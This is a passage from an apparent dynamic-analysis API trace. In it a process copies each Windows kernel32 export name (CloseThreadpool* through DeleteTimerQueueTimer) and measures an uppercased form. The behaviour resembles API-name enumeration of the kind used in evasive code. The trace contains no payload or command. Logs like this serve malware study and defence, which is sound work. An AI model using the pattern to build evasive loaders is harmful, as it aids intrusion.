(lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0158.093] lstrcpyA (in: lpString1=0x239f180, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0158.093] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0158.093] lstrcpyA (in: lpString1=0x239f180, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0158.093] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0158.093] lstrcpyA (in: lpString1=0x239f180, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0158.093] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0158.093] lstrcpyA (in: lpString1=0x239f180, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0158.093] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0158.093] lstrcpyA (in: lpString1=0x239f180, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0158.093] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0158.093] lstrcpyA (in: lpString1=0x239f180, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0158.093] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0158.093] lstrcpyA (in: lpString1=0x239f180, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0158.093] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0158.093] lstrcpyA (in: lpString1=0x239f180, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0158.093] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0158.093] lstrcpyA (in: lpString1=0x239f180, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0158.093] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0158.093] lstrcpyA (in: lpString1=0x239f180, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0158.094] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0158.094] lstrcpyA (in: lpString1=0x239f180, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0158.094] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0158.094] lstrcpyA (in: lpString1=0x239f180, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0158.094] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0158.094] lstrcpyA (in: lpString1=0x239f180, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0158.094] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0158.094] lstrcpyA (in: lpString1=0x239f180, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0158.094] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0158.094] lstrcpyA (in: lpString1=0x239f180, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0158.094] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0158.094] lstrcpyA (in: lpString1=0x239f180, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0158.094] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0158.094] lstrcpyA (in: lpString1=0x239f180, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0158.094] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0158.094] lstrcpyA (in: lpString1=0x239f180, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0158.094] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0158.094] lstrcpyA (in: lpString1=0x239f180, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0158.094] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0158.094] lstrcpyA (in: lpString1=0x239f180, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0158.094] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0158.094] lstrcpyA (in: lpString1=0x239f180, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0158.094] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0158.094] lstrcpyA (in: lpString1=0x239f180, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0158.094] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0158.094] lstrcpyA (in: lpString1=0x239f180, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0158.094] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0158.094] lstrcpyA (in: lpString1=0x239f180, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0158.094] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0158.094] lstrcpyA (in: lpString1=0x239f180, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0158.094] lstrlenA (lpString="COPYCONTEXT") returned 11 [0158.094] lstrcpyA (in: lpString1=0x239f180, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0158.094] lstrlenA (lpString="COPYFILEA") returned 9 [0158.094] lstrcpyA (in: lpString1=0x239f180, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0158.094] lstrlenA (lpString="COPYFILEEXA") returned 11 [0158.094] lstrcpyA (in: lpString1=0x239f180, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0158.095] lstrlenA (lpString="COPYFILEEXW") returned 11 [0158.095] lstrcpyA (in: lpString1=0x239f180, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0158.095] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0158.095] lstrcpyA (in: lpString1=0x239f180, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0158.095] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0158.095] lstrcpyA (in: lpString1=0x239f180, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0158.095] lstrlenA (lpString="COPYFILEW") returned 9 [0158.095] lstrcpyA (in: lpString1=0x239f180, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0158.095] lstrlenA (lpString="COPYLZFILE") returned 10 [0158.095] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0158.095] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0158.095] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0158.095] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0158.095] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0158.095] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0158.095] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0158.095] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0158.095] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0158.095] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0158.095] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0158.095] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0158.095] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0158.095] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0158.095] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0158.096] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0158.096] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0158.096] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0158.096] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0158.096] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0158.096] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0158.096] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0158.096] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0158.096] lstrlenA (lpString="CREATEEVENTA") returned 12 [0158.096] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0158.096] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0158.096] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0158.096] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0158.096] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0158.096] lstrlenA (lpString="CREATEEVENTW") returned 12 [0158.096] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0158.096] lstrlenA (lpString="CREATEFIBER") returned 11 [0158.096] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0158.096] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0158.096] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0158.096] lstrlenA (lpString="CREATEFILEA") returned 11 [0158.096] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0158.096] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0158.096] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0158.096] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0158.096] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0158.096] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0158.096] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0158.096] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0158.097] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0158.097] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0158.097] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0158.097] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0158.097] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0158.097] lstrlenA (lpString="CREATEFILEW") returned 11 [0158.097] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0158.097] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0158.097] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0158.097] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0158.097] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0158.097] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0158.097] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0158.097] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0158.097] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0158.097] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0158.097] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0158.097] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0158.097] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0158.097] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0158.097] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0158.097] lstrlenA (lpString="CREATEJOBSET") returned 12 [0158.097] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0158.097] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0158.097] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0158.097] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0158.097] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0158.097] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0158.097] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0158.097] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0158.097] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0158.097] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0158.097] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0158.097] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0158.097] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0158.097] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0158.098] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0158.098] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0158.098] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0158.098] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0158.098] lstrcpyA (in: lpString1=0x239f180, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0158.098] lstrlenA (lpString="CREATEPIPE") returned 10 [0158.098] lstrcpyA (in: lpString1=0x239f180, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0158.098] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0158.098] lstrcpyA (in: lpString1=0x239f180, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0158.098] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0158.098] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0158.098] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0158.098] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0158.098] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0158.098] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0158.098] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0158.098] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0158.098] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0158.098] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0158.098] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0158.098] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0158.098] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0158.098] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0158.098] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0158.098] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0158.098] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0158.098] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0158.098] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0158.098] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0158.098] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0158.098] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0158.098] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0158.098] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0158.098] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0158.098] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0158.098] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0158.098] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0158.099] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0158.099] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0158.099] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0158.099] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0158.099] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0158.099] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0158.099] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0158.099] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0158.099] lstrlenA (lpString="CREATETHREAD") returned 12 [0158.099] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0158.099] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0158.099] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0158.099] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0158.099] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0158.099] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0158.099] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0158.099] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0158.099] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0158.099] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0158.099] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0158.099] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0158.099] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0158.099] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0158.099] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0158.099] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0158.099] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0158.099] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0158.099] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0158.099] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0158.099] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0158.099] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0158.099] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0158.099] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0158.099] lstrcpyA (in: lpString1=0x239f180, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0158.100] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0158.100] lstrcpyA (in: lpString1=0x239f180, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0158.100] lstrlenA (lpString="CTRLROUTINE") returned 11 [0158.100] lstrcpyA (in: lpString1=0x239f180, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0158.100] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0158.100] lstrcpyA (in: lpString1=0x239f180, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0158.100] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0158.100] lstrcpyA (in: lpString1=0x239f180, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0158.100] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0158.100] lstrcpyA (in: lpString1=0x239f180, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0158.100] lstrlenA (lpString="DEBUGBREAK") returned 10 [0158.100] lstrcpyA (in: lpString1=0x239f180, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0158.100] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0158.100] lstrcpyA (in: lpString1=0x239f180, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0158.100] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0158.100] lstrcpyA (in: lpString1=0x239f180, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0158.100] lstrlenA (lpString="DECODEPOINTER") returned 13 [0158.100] lstrcpyA (in: lpString1=0x239f180, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0158.100] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0158.100] lstrcpyA (in: lpString1=0x239f180, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0158.100] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0158.100] lstrcpyA (in: lpString1=0x239f180, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0158.100] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0158.100] lstrcpyA (in: lpString1=0x239f180, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0158.100] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0158.100] lstrcpyA (in: lpString1=0x239f180, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0158.100] lstrlenA (lpString="DELETEATOM") returned 10 [0158.100] lstrcpyA (in: lpString1=0x239f180, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0158.100] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0158.100] lstrcpyA (in: lpString1=0x239f180, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0158.100] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0158.100] lstrcpyA (in: lpString1=0x239f180, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0158.100] lstrlenA (lpString="DELETEFIBER") returned 11 [0158.100] lstrcpyA (in: lpString1=0x239f180, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0158.100] lstrlenA (lpString="DELETEFILEA") returned 11 [0158.100] lstrcpyA (in: lpString1=0x239f180, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0158.101] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0158.101] lstrcpyA (in: lpString1=0x239f180, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0158.101] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0158.101] lstrcpyA (in: lpString1=0x239f180, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0158.101] lstrlenA (lpString="DELETEFILEW") returned 11 [0158.101] lstrcpyA (in: lpString1=0x239f180, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0158.101] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0158.101] lstrcpyA (in: lpString1=0x239f180, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0158.101] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0158.101] lstrcpyA (in: lpString1=0x239f180, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0158.101] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0158.101] lstrcpyA (in: lpString1=0x239f180, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0158.101] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0158.101] lstrcpyA (in: lpString1=0x239f180, lpString2="DeleteVolumeMountPointA" | out: 